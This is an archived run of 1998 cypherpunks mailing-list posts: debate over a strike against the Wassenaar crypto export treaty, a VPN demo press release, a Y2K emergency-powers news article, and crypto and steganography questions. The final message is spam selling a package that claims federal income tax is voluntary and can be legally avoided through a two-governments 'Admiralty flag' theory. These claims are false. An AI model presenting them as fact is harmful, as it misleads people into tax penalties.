> :Packet Storm Security        http://www.Genocide2600.com/~tattooman/
> :E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
> :NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
> :PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/
> :
> :___________________________________________________________________
> :Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov
> :
> :-----BEGIN PGP SIGNATURE-----
> :Version: PGPfreeware 5.0i for non-commercial use
> :Charset: noconv
> :
> :iQEVAwUBNm/VQJDw1ZsNz1IXAQGzygf/Zt/sP419T5dA1gY/Rru7ACtv6xWXWMUA
> :HDBQPFbGV8yviOIU7N2bHndWGtr+hjPcdoudoXlOwYF73/TybNSzs6J/iAF9yhSR
> :UmRKM+suH8FwJ90F+i36W8hCQrkhPYXEwXW4AWDEeGNKjZdRLApS/POMcnTWoTSK
> :iHwDsdE+AevhlcWuC1nk80AlSEVNE/B2zmbWGax12tciM2NxTc4AqtqI3BwXebVq
> :f/04ZC9515dR/XHGhtbmQ08sTNS9eQUG8H626XE58XtE+MOsVEJYjUQFDd9L13T2
> :dlun/4+U1J9xMmN8uYlUySxKr9XmharSXLJCmpmIaE0bwDwTx7Pkpw==
> :=DaVN
> :-----END PGP SIGNATURE-----
> :
> :




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Thu, 10 Dec 1998 19:18:34 -0800 (PST)
To: Steve Orrin <privsoft@ix.netcom.com>
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <367062FA.AA2ADF58@ix.netcom.com>
Message-ID: <Pine.BSF.3.96.981210211237.8844A-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 6077
Lines: 146


I agree that the primary damage, and resultant attention, is [necessarily]
focused upon those whom [indirectly] had the least to do with "inflicting"
this upon us (very accurately put), however, it is also the way most
likely to generate the necessary awareness of the issues.  Our biggest
problem isn't that Wassenaar is forced upon us by bureaucrats: our problem
is that hundreds of these types of things are forced upon us every year,
and *nobody cares*.  Our people have become so totally numbed and
apathetic, that if they are not "bitten" directly, they could care less.

I submit that this strike allows them to be bitten, albeit mildly, and
that this *may* (and may very well *not*) raise their attention level a
notch or two...

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------


On Thu, 10 Dec 1998, Steve Orrin wrote:

:Date: Thu, 10 Dec 1998 19:10:34 -0500
:From: Steve Orrin <privsoft@ix.netcom.com>
:To: Missouri FreeNet Administration <measl@mfn.org>,
:    Ken Williams <jkwilli2@unity.ncsu.edu>
:Cc: cypherpunks@toad.com, cypherpunks@algebra.com,
:    cypherpunks@einstein.ssz.com
:Subject: Re: Global Strike to protest Wassenaar
:
:I believe that a mass strike only hurts our employers, not the gov'ts
:that are afflicting us with crap like Wassenaar. I propose that we
:designate Monday "International Export Crypto Day". We should pick a
:gov't agency or member (in a gov't other than our own) and email crypto 
:to him/her. Mass effort will demonstrate the absolute idiocy of
:regulations like Wassenaar. maybe even a mass chain letter with RSA in 3
:lines of perl emailed all over the world and forward via typical chain
:letter mechanisms. 
:
:so
:privsoft@ix.netcom.com
:
:
:Missouri FreeNet Administration wrote:
:> 
:> This is an excellent idea...  I have just massmailed an announcement
:> to our members: Missouri FreeNet will not be be operating on 14 December.
:> Has anyone considered creating a (web?) list of persons and organizations
:> who have committed to this strike? People are more likely to participate
:> when they know they are no alone...
:> 
:> Yours,
:> J.A. Terranson
:> sysadmin@mfn.org
:> 
:> --
:> If Governments really want us to behave like civilized human beings, they
:> should give serious consideration towards setting a better example:
:> Ruling by force, rather than consensus; the unrestrained application of
:> unjust laws (which the victim-populations were never allowed input on in
:> the first place); the State policy of justice only for the rich and
:> elected; the intentional abuse and occassionally destruction of entire
:> populations merely to distract an already apathetic and numb electorate...
:> This type of demogoguery must surely wipe out the fascist United States
:> as surely as it wiped out the fascist Union of Soviet Socialist Republics.
:> 
:> The views expressed here are mine, and NOT those of my employers,
:> associates, or others.  Besides, if it *were* the opinion of all of
:> those people, I doubt there would be a problem to bitch about in the
:> first place...
:> --------------------------------------------------------------------
:> 
:> On Thu, 10 Dec 1998, Ken Williams wrote:
:> 
:> :Date: Thu, 10 Dec 1998 09:05:58 -0500 (EST)
:> :From: Ken Williams <jkwilli2@unity.ncsu.edu>
:> :To: cypherpunks@toad.com
:> :Subject: Global Strike to protest Wassenaar
:> :
:> :-----BEGIN PGP SIGNED MESSAGE-----
:> :
:> :
:> :Hi,
:> :
:> :"Strike to protest Wassenaar!"
:> :
:> :URL:  http://www.zanshin.com/~bobg/
:> :
:> :"This is a global call for computer professionals to strike on
:> :Monday, 14 December, 1998 to protest the signing of the Wassenaar
:> :Arrangement, an international treaty that imposes new restrictions
:> :on cryptographic software technology. The strike is meant to raise
:> :awareness about the importance of cryptography, about the U.S.
:> :government's wrongheaded attempts to curtail its use, and about the
:> :strong-arm tactics used by the United States to pressure other
:> :countries into limiting their citizens' rights the way it has
:> :limited its own."
:> :
:> :
:> :Regards,
:> :
:> :Ken Williams
:> :
:> :Packet Storm Security        http://www.Genocide2600.com/~tattooman/
:> :E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
:> :NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
:> :PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/
:> :
:> :___________________________________________________________________
:> :Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov
:> :
:> :-----BEGIN PGP SIGNATURE-----
:> :Version: PGPfreeware 5.0i for non-commercial use
:> :Charset: noconv
:> :
:> :iQEVAwUBNm/VQJDw1ZsNz1IXAQGzygf/Zt/sP419T5dA1gY/Rru7ACtv6xWXWMUA
:> :HDBQPFbGV8yviOIU7N2bHndWGtr+hjPcdoudoXlOwYF73/TybNSzs6J/iAF9yhSR
:> :UmRKM+suH8FwJ90F+i36W8hCQrkhPYXEwXW4AWDEeGNKjZdRLApS/POMcnTWoTSK
:> :iHwDsdE+AevhlcWuC1nk80AlSEVNE/B2zmbWGax12tciM2NxTc4AqtqI3BwXebVq
:> :f/04ZC9515dR/XHGhtbmQ08sTNS9eQUG8H626XE58XtE+MOsVEJYjUQFDd9L13T2
:> :dlun/4+U1J9xMmN8uYlUySxKr9XmharSXLJCmpmIaE0bwDwTx7Pkpw==
:> :=DaVN
:> :-----END PGP SIGNATURE-----
:> :
:> :
:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Thu, 10 Dec 1998 21:11:46 -0800 (PST)
To: Kevlar <webmaster@max-web.com>
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <3.0.6.32.19981210163644.0088ec30@max-web.com>
Message-ID: <199812110422.XAA003.17@whgiii>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1062
Lines: 33


In <3.0.6.32.19981210163644.0088ec30@max-web.com>, on 12/10/98 
   at 04:36 PM, Kevlar <webmaster@max-web.com> said:

>Not only will Maximum Web Design (www.max-web.com) not be operating on
>December 14, I have plenty of bandwith for a page with all the
>participants. Would be happy to maintain it too...

>Please e-mail me. anti-wassenaar@max-web.com

>Only serious requests -=WITH A URL=- will be accepted.
>Will post the address to the list asap.

The domain of openpgp.net will be down in protest on the 14th. Perhaps
someone could design a common webpage that we all could use outlining why
our sites are down.

I also plan on bouncing all mail to the openpgp.net domain on that day. :)

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 10 Dec 1998 15:06:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Wassenaar summary (and a funny new loophole)
Message-ID: <199812102307.AAA08302@replay.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 458
Lines: 12


Are items freely exportable between countrys that are party to this agreement?

>Systems that do not meet those conditions are export-controlled if they
>use symmetric encryption with more than 56 bit keys, algorithms based
>on factorization or on logarithms in finite fields with more than 512
>bit keys (e.g. RSA, DH) or on discrete logarithms in other groups (such
>as elliptic curves) with more than 112 bits. They may be exported for
>personal use.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 10 Dec 1998 15:38:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: riots cancelled on account of weather..
Message-ID: <199812102340.AAA11263@replay.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 238
Lines: 26



At 02:45 PM 12/8/98 -0600, Jim Choate wrote:
>Damn, you beat me to it. I was going to post something about a dry run for
>Y2K in San Fran.
>
>Any rioting?
>

Too cold and rainy.  You need a summer outage for true fun.








  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Fri, 11 Dec 1998 04:33:12 -0800 (PST)
To: Richard.Bragg@ssa.co.uk>
Subject: RE: Global Strike to protest Wassenaar
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8618@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 557
Lines: 17


Richard Bragg wrote:

>  Ever played Mornington Crescent?  Try the same thing with
>  e-mail.   The idea is that only those in the game know "the rules".
>  These rules can change at any time in any way and all
>  "real players" can tell about the new "rules" and adjust accordingly.

showing of course that he either doesn't know the *real*  rules of
Mornington Crescent or else (more likely) doesn't want to reveal them!  Oh,
and this posting quite clearly wins this round - even with the new DLR
extensions and the Elverson Road footbridge:-)  

Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Fri, 11 Dec 1998 02:00:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Global Strike to protest Wassenaar
Message-ID: <802566D7.00361B16.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 587
Lines: 18


Ever played Mornington Crescent?  Try the same thing with e-mail.  The idea
is that only those in the game know "the rules".  These rules can change at
any time in any way and all "real players" can tell about the new "rules"
and adjust accordingly.

The idea would be to exchange nothing while make it appear to be exchanging
information of real importance.  OK so this will be just like any managment
memo but you must get my drift.

Hack together a proggy to "encrypt" a message but really just generates
garbage, just like politicians.  Leave patterns in it so it looks real.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Fri, 11 Dec 1998 01:24:43 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: MEDIA RELEASE: Data Fellows' F-Secure VPN+ demo; An easy way to test strong Internet encryption
Message-ID: <3.0.32.19981211112352.00937240@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 5309
Lines: 124


  
Press Release				For immediate release 

Data Fellows' F-Secure VPN+ demo 
An easy way to test strong Internet encryption

Espoo, Finland, December 11, 1998. - Data Fellows, one of the world's
leading developers of anti-virus and encryption software, has set up a demo
of the commercial version of F-Secure VPN+, whereby companies can test an
encrypted IPSec connection between their own machine and a VPN+ Server at
the Data Fellows site. The supported platform is Windows NT 4.0 (Intel)
with an Ethernet network adapter. The release works on both single and
multi-processor machines.

An encrypted IPSec connection can be set up by downloading and installing
the F-Secure VPN+ Demo Client, available at the Data Fellows web site
(http://www.DataFellows.com/f-secure/vpn-plus/demo/), and connecting
through it to the F-Secure VPN+ server. This set-up in no way affects a
company's other network traffic; all other hosts and network services may
be accessed as usual. Unlike the commercial version of VPN+, it is not
possible to create encrypted connections to hosts other than
VPNPlus.DataFellows.com. This server cannot be contacted without the VPN+
demo client.

The demo client has been configured to establish an IPSec encrypted (3des)
connection to VPNPlus.DataFellows.com (IP:194.252.6.42). A random session
key will be negotiated for each connection. Host authentication is
performed using a shared secret 0x462D534543555245 (i.e. "F-SECURE" in
hex). Access to all other networks (local/Internet) is provided without
additional IPSec security. 

In the commercial version of F-Secure VPN+, the network administrator
determines which connections are permitted and which connections need to be
encrypted. The commercial version of the product features F-Secure
Administrator for central management, network wide security policy
distribution and F-Secure VPN+ Certificate Wizard for a complete VPN
Certificate Authority service. 

In addition to F-Secure VPN+ Demo Client, a Lotus ScreenCam presentation of
F-Secure Administrator can be downloaded, as well as the user's manual of
the commercial version. The presentation shows how easily the network
administrator can create and maintain a security policy for the whole
Virtual Private Network.

End-user installation of the commercial version can be done using AUTOINST
network-wide deployment tools and it provides a fully transparent network
security solution to the user. No user-interfaces are left to the user to
stumble with.

About Data Fellows

Data Fellows is one of the world's leading developers of data security
products. The Company develops, markets and supports anti-virus, data
security and cryptography software products for corporate computer
networks. It has principal offices in San Jose, California, and Espoo,
Finland, with regional offices and corporate partners, VARs and other
distributors in over 80 countries around the world. 

Data Fellows has customers in more than 100 countries, including many of
the world's largest industrial corporations and best-known
telecommunications companies, major international airlines, European
governments, post offices and defense forces, and several of the world's
largest banks. 

The Company was named one of the Top 100 Technology companies in the world
by Red Herring magazine in its September 1998 issue. Other commendations
include Hot Product of the Year 1997 (Data Communications Magazine); Best
Anti-Virus product (SVM Magazine, May 1997); Editor's Choice (SECURE
Computing Magazine); and the 1996 European Information Technology Prize.

About F-Secure products

All F-Secure products are integrated into the F-Secure Framework management
architecture, which provides a three-tier, scaleable, policy-based
management infrastructure to minimize the costs of security management. 

F-Secure Workstation Suite consists of malicious code detection and removal
as well as unobtrusive file and network encryption, all integrated into a
policy-based management architecture.

F-Secure Anti-Virus, with multiple scanning engines (including F-PROT and
AVP), is the most comprehensive, real-time virus scanning and protection
system for all Windows platforms. 

F-Secure VPN+ provides a software-based, IPSec-compliant Virtual Private
Network solution for large corporate networks as well as remote and small
office networks. 

F-Secure FileCrypto is the first and only product to integrate strong
real-time encryption directly into the Windows file system. 

F-Secure SSH provides secure remote login, terminal, and other connections
over unsecured networks. It is the most widely used secure remote
administration tool.

F-Secure NameSurfer is the solution for remote Internet and Intranet DNS
administration. Its easy-to-use WWW user interface automates and simplifies
DNS administration.
For more information, please contact:

USA:
Data Fellows Inc. 
Mr. Pirkka Palomki, Product Manager 
Tel. +1 408 938 6700, fax +1 408 938 6701
E-mail: Pirkka.Palomki@DataFellows.com

Europe:
Data Fellows Oy
Mr. Topi Hautanen, Product Manager
PL 24  
FIN-02231 ESPOO				
Tel. +358 9 859 900, fax. +358 9 8599 0599
E-mail: Topi.Hautanen@DataFellows.com
or visit our web site at http://www.DataFellows.com


--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 12 Dec 1998 16:50:32 -0800 (PST)
To: "e$@vmeng.com" <e$@vmeng.com>, "Cypherpunks" <libre@colba.net>
Subject: 'Martial law' rushed for Y2K chaos
Message-ID: <199812130055.TAA09162@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 8136
Lines: 120


LOCAL 
 Saturday 12 December 1998 

'Martial law' rushed for Y2K chaos Report warns government to be ready to 
invoke federal Emergencies Act

 By David Pugliese           The Ottawa Citizen

  The federal government should consider invoking the Emergencies Act, the 
successor to the War Measures Act, if the millennium bug causes widespread 
chaos, according to newly obtained government documents.  The report, by the 
Year 2000 contingency planning group of Emergency Preparedness Canada, calls 
for orders and regulations for the Emergencies Act to be ready by the end of 
March.  "In the worst case, we should consider the Emergencies Act a potential 
source of special powers," urge documents prepared by government in July and 
August and obtained by the Citizen under the Access to Information Act.  
"Among the activities that must be done to meet the problems resulting from 
Y2000 failures is development of relevant emergency orders and regulations 
required for the invocation of emergency provisions under the Emergencies 
Act."  Federal departments are to identify what emergency orders would be 
needed in their areas of responsibility to deal with a countrywide disaster 
caused by the millennium bug. Those orders and regulations should have been in 
place in 1988 -- when the Emergencies Act was brought in to replace the War 
Measures Act -- but federal departments failed to develop them. While the lack 
of emergency orders and regulations among federal departments would not have 
prevented the Emergencies Act from being invoked, it would have meant that any 
federal response to a large-scale crisis would not have run smoothly.  Defence 
Minister Art Eggleton, who is in charge of Emergency Preparedness Canada, will 
also be issued with a step-by-step guidebook on actions to be taken in a 
"major or catastrophic emergency" caused by the millennium bug, according to 
the report.  That book will include all the documents needed and the names of 
provincial officials who should be consulted before the federal government 
invokes the Emergencies Act.  The War Measures Act was last invoked by Prime 
Minister Pierre Trudeau on Oct. 16, 1970, to deal with the FLQ terrorist 
threat -- the first and only peacetime implementation of such sweeping powers.  
The Front de Liberation du Quebec had kidnapped British diplomat James Cross, 
who was later released, and Liberal cabinet minister Pierre Laporte, who was 
slain. During the crisis, Canadian troops were ordered to protect public 
figures, and 497 possible suspects were arbitrarily rounded up and arrested in 
an attempt to break the FLQ cell structure.  Defence spokesman Maj. John 
Blakeley said the process now being put in place is simply part of prudent 
planning to deal with the millennium bug and does not automatically mean the 
Emergencies Act will be enacted.  "The question of whether it will be required 
or not is one that will have to be determined at the time," Maj. Blakeley 
said. "Basically, this is saying, 'If it gets to that stage, is everything 
ready?' "  Maj. Blakeley said all scenarios have to be considered, including 
the most unlikely one: widespread major problems caused by the millennium bug. 
He added that the Defence department is confident it will be ready to handle 
any emergencies associated with the computer glitch.  But the Auditor General 
has continually warned that the federal government is lacking in its emergency 
response capabilities. Among the criticisms over the years:  - In 1997, the 
Auditor General voiced concern that not enough was being done to deal with an 
emergency caused by a major oil or chemical spill;  - In 1992, the Auditor 
General repeated warnings that the government had still not created an 
emergency program to deal with an earthquake. The Auditor General's office 
says those plans are still undeveloped.  - In 1989, the Auditor General 
pointed out that the emergency orders and measures needed by federal 
departments for the Emergencies Act had not been mapped out. Nine years later, 
that remains the case.  Jim Hanson, a defence analyst and retired Canadian 
Army brigadier general, said the Emergencies Act contains the same sweeping 
powers to deal with unrest and civil emergencies. But he said it is likely 
such measures are intended more to give powers to civilian agencies, such as 
police forces, in case there are problems from the millennium bug.  "It 
wouldn't take much under the existing National Defence Act or the 'aid to 
civil powers' provisions to put military personnel on the streets."  Some 
computer analysts believe the millennium bug, also known as the Year 2000 or 
Y2K problem, will cause only minor disruptions. But others predict it will 
trigger widespread disruptions in computers that control everything from hydro 
and financial systems to air-traffic control.  The problem centres on the fact 
that the internal counters of computers will read the year 2000 simply as 00. 
That could cause them to crash as they misread the 00 for the year 1900.  
Several months ago the Canadian Forces were told to prepare for the biggest 
peacetime deployment of troops ever in case computer failures caused by the 
Year 2000 problem disrupted key services. The plan, dubbed Operation Abacus, 
also involves the development of rules governing the use of force by soldiers 
in case they are called upon to assist police in dealing with emergency 
incidents.  The reports obtained by the Citizen predict the first wave of 
computer failures could hit Canada on Sept. 9, 1999, because systems might 
have problems handling that date sequence, which is 9-9-99. The Defence 
department will activate a national co-ordination centre to handle emergency 
response to the millennium bug the day before that date, according to the 
documents.  As part of its preparations, the national co-ordination centre 
will also run several exercises to test military readiness. In April, federal 
and provincial agencies in Quebec and Ontario will conduct a three-day 
training scenario involving a nuclear emergency -- a major test and evaluation 
of how the federal government and provinces can respond to a large-scale 
emergency that might result from the millennium bug, according to the Access 
documents.  In the reports, military officials also raise concern that their 
ability to help out if the millennium bug causes widespread problems relies 
heavily on Canada's electrical, transportation, food and water and sewage 
systems having their own Year 2000 problems under control: "The ability of the 
(Canadian Forces) to provide civil assistance is highly dependent on the state 
of preparedness of these infrastructure items since the CF, like everyone 
else, is highly dependent on smooth delivery of these supplies and services," 
the documents state. "Without aggressive action in these industrial and 
service sectors, the (Canadian Forces) may not be able to make a significant 
impact across the nation as a force of last resort."  Military officials point 
out that more than 16,000 troops were needed to deal with the effects of the 
ice storm that hit Ontario and Quebec this year. But the millennium bug, the 
report states, "has the potential of creating a demand orders of magnitude 
greater than this, which are well beyond the CF's capability to respond."  
Defence officials called for "aggressive and preventive actions" now to reduce 
the Year 2000 risk to a more manageable level.  The military will have about 
32,000 of its personnel dedicated to Operation Abacus, with thousands more 
available if needed.  In November, the Commons Public Accounts committee 
questioned whether the Canadian Forces would be able to deal with countrywide 
problems that might be caused by the millennium bug.  But several weeks later, 
a report by Auditor General Denis Desautels found that the critical systems 
the Defence department needs should computer foul-ups create civil chaos are 
largely ready. These included systems that support the movement of troops and 
supplies and handling of communications.
 
Copyright 1998 Ottawa Citizen 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GregShow2@aol.com
Date: Sat, 12 Dec 1998 20:15:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Question About "C" programming
Message-ID: <9783faa1.36733e96@aol.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 64
Lines: 5


Could you please send me more information on this language.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Dec 1998 10:21:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mathematician-to-silicon compilers and the Law
Message-ID: <199812131822.TAA01749@replay.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2113
Lines: 80


>> >publishing a paper on the algorithm also transmits that knowledge making

1. In the *best-case*, the published paper transmits some knowledge to the
reader :-)

2. In ECAD, tools try to go from that published Paper to circuits.  
In SoftE, tools try to go from english specs to runnable prototypes. 

Meanwhile, the humans who do various steps of this translation
get paid reasonably well.

2. But eventually normal english prose will be *mechanically translatable*
to a machine-ready format.  Which means that free speech law starts 
mixing with machine law (patents, export restrictions, posession
restrictions).

Because the Instructions become the Thing.

You can sell instructions on converting your rifle to full auto, or
stealing cable TV.  They're protected speech.   But suppose you could feed
a properly formatted blueprint into a universal fabricator and get a full
auto rifle out?

Crypto source code fed to a universal computer gives you a regulated item;
what  happens to the law when regular english is just a few clicks away
from being an executable?  A chip?

There is a fundamental issue that the law doesn't handle at all consistently,
because it previously didn't matter much, but which every CS Ugrad knows: 

There is no difference between software, and hardware. Only such annoyances
as cost, development time, throughput, flexibility, etc. 

(Not everyone can see machines as instantiations of ideas.  Politicians
have particular problems linking abstractions to atoms.  Fortunately, those
that
can see machines as ideas can turn their ideas into machines.)

I see two extrapolated futures.  In one, the end result is restrictions on
free speech in certain areas (e.g., crypto), for the benefit of national
insecurity and the Children.  In the other, the Law will have to allow you
whatever posessions you like, and only punish *actions* after the fact.
Given recent historical trends...


-----------

Imagine biologists couldn't publish new enkephalin sequences because
someone might put them into a programmable yeast and make unlicensed
medicines..





















  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Dec 1998 13:06:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: steganography detection hazard?
Message-ID: <199812132107.WAA14717@replay.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 473
Lines: 35


Suppose you take your plaintext, encrypt it,
then spread the bits across an image as the LSBs.

The LSBs will, if you've used a decent cipher, 
have perfectly uniform distribution.

The 'noise' LSBs in a chunk of *digitized* bits will show
a *uniform* distribution.  (As indeed will the cipher's blocks,
or any bitchunk larger or smaller.)

Therefore an entropy test (see Maurer) will discriminate
between the two.

Please prove me wrong.

--Stegosaur










  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Sun, 13 Dec 1998 14:44:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: passwords and hashes
Message-ID: <19981213234401.A25332@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1215
Lines: 32


I'm looking into how passwords should be transferred into keys for the
loopback filesystem in Linux.  Currently, what happens is that you
take the SHA or RIPEMD-160 hash of the password string and use that as
a key.  If the cipher only uses a 128-bit key, the last 32 bits of the
hash is unused.  I have some questions about this scheme:

o In the case of a 128-bit cipher, do I lose any information by not
  using the last 32 bits of information?  Should the last 32 bits be
  xored with the first 128 in order to not lose any info?

o Is there any advantage to _not_ using a 256-bit hash function? (i.e
  - use a 128-bit hash for 128-bit ciphers).  Currently there are lots
  of AES ciphers that don't get fed a 256-bit key because we only have
  a 160-bit hash.

o Is there a good 256-bit hash function?  I don't know of any other
  than snefru.  In this application, speed doesn't matter much.
  Should I use a 256-bit cipher instead maybe?

o Is it safe to always take the hash of the password, or is it better to
  use the password directly as the key if it is less than 16
  characters for 128-bit cipher?

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zebra911@usa.net
Date: Mon, 14 Dec 1998 02:29:04 -0800 (PST)
Subject: Legally Pay No Federal Income Tax !
Message-ID: <199812141028.CAA29112@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 7120
Lines: 161


        =======================================================
                Liberty Electronic Press -- News Release                    
                            ***************


What you are about to learn here may be shocking to you so be pre-
pared to learn what most Americans don't know.
First of all there are TWO different American Flags. The most common
one you all have seen and recognize. It's Old Glory with the Stars
and Stripes as you most commonly see displayed outside homes, offices
and the Post Office. It is the Flag of "The Republic united States of
America". The lower case u in the word united, is proper, and is as
written in "The Declaration of Independence".

Our other American Flag is just the same as Old Glory accept it has
a yellow fringe around it. This flag is an Admiralty Flag and is
usually displayed indoors in government offices and many court rooms.
Just as there are two different American Flags there are two dif-
ferent American Governments. I'm not referring to political parties.
The two governments are: "The Republic united States of America",
flying Old Glory and "The [district] United States of America" flying
Old Glory with the yellow fringe, or the Admiralty Flag.

"The Republic united States of America" gives you RIGHTS and The
Constitution of the United States.

"The [district] United States", gives you privileges such as allowing
you to sell or deal in Alcohol, Tobacco and fire arms and to own a
corporation.

All Americans that work for the government, whether it be Federal,
State, County or City or live or work on government land such as
Washington, D.C., Guam, Samoa, Puerto Rico, the Virgin Islands and
other ceded lands are under the jurisdiction of "The [district] 
United States" and the Admiralty Flag.

If you are not in the jurisdiction of "The [district] United States"
and the Admiralty Flag you can be EXEMPTED from the Federal Income
Tax, filing, withholding, and record keeping. To do this you must get
out of their jurisdiction and refute their jurisdiction over you.
You will then be considered a Non-Resident Alien and a foreign entity
with respect to "The [district] United States".

YOU DO NOT LOOSE ANY RIGHTS AND YOU ARE STILL CONSIDERED AN AMERICAN
CITIZEN. ACTUALLY YOU GAIN A RIGHT, I.E. YOU DON'T HAVE TO PAY 
FEDERAL INCOME TAX!!!



   The Founding Fathers of The United States of America wrote our Con-
stitution, Bill of Rights and Declaration of Independence to set us FREE
from TYRANNY and TAXATION.

   Our Founding Fathers did not want our government to make you pay
INCOME TAXES. If you study the Constitution, and the IRS tax laws, you 
will find that paying income taxes is not mandatory.  It is based on a
voluntary system. The LAWS and the SUPREME COURT and the IRS have ruled 
that Federal income taxes are VOLUNTARY and FILING A RETURN IS NOT
REQUIRED in many cases if you properly VOLUNTEER OUT OF THE SYSTEM AND
THEIR JURISDICTION..

   "Our tax system is based on individual self assessment and 
      VOLUNTARY COMPLIANCE." - M. Caplin, IRS Commissioner

"OUR TAX SYSTEM IS BASED UPON VOLUNTARY ASSESSMENT AND PAYMENT AND NOT
ON DISTRAINT" -Supreme Court Ruling, Flora v. U.S., 362 U.S. 145

It is very EASY and LEGAL to volunteer out of the IRS tax system, but
you must know the EXACT PROCESS REQUIRED to do this simple task. If
you don't know the correct way to do this, you could be FINED $500 by
the IRS.

    If you will spend JUST $59.00 we will send you our package:
                  "BEAT THE IRS & PAY-NO-MORE".
             Our information will SET YOU FREE  LEGALLY!

After reading our reports and filling out a simple form you will be
FREE from the IRS BANDITS and the graduated Federal INCOME TAX ...
FOREVER. Our information is guaranteed to STOP FEDERAL INCOME TAX 
WITHHOLDING from your pay check!!! You will never have to pay Federal
income taxes again. You will never have to file a 1040 Form again. You
will never have to keep personal expense or income records. You will
be completely FREE from the Federal income tax. We send you absolute
PROOF you do not have to file a return.

After reading our report and following simple instructions your pay 
check will be free from those nasty income tax deductions. This will
put an extra $20 to $200 in your pocket every week!.

       "ISN'T IT ABOUT TIME YOU GET PAID WHAT YOUR WORTH?"

        Now is the time to fight back. Please read on!!!
         **********************************************

                  "BEAT-THE-IRS  & PAY-NO-MORE"

Our PACKAGE, (Beat The IRS & PAY-NO-MORE) will teach you EXACTLY how
to EASILY: STOP FEDERAL Income Tax Withholding, STOP April filing of
1040 Form, &  STOP THE IRS EXTORTION PERMANENTLY! This works for all
Citizens that are not government employes, don't deal in Alcohol,
Tobacco, or fire arms, or own a corporation or own a business where
you are under a duty to withold from your employes paycheck.
-------------------------------------------------------------------
The IRS Federal Income Tax System is based on VOLUNTARY COMPLIENCE...
We will teach you how to legally VOLUNTEER OUT OF THE SYSTEM!
-------------------------------------------------------------------
Your Success is ABSOLUTELY Unconditionally GUARANTEED! Our methods 
work every time for everybody if you were born in and live in one of
the 50 Republic States and are not a government employee. Also you
can not live or work on Government Property such as a Military base,
Washington, D.C., Guam, Semoa, Virgin Islands, etc. 
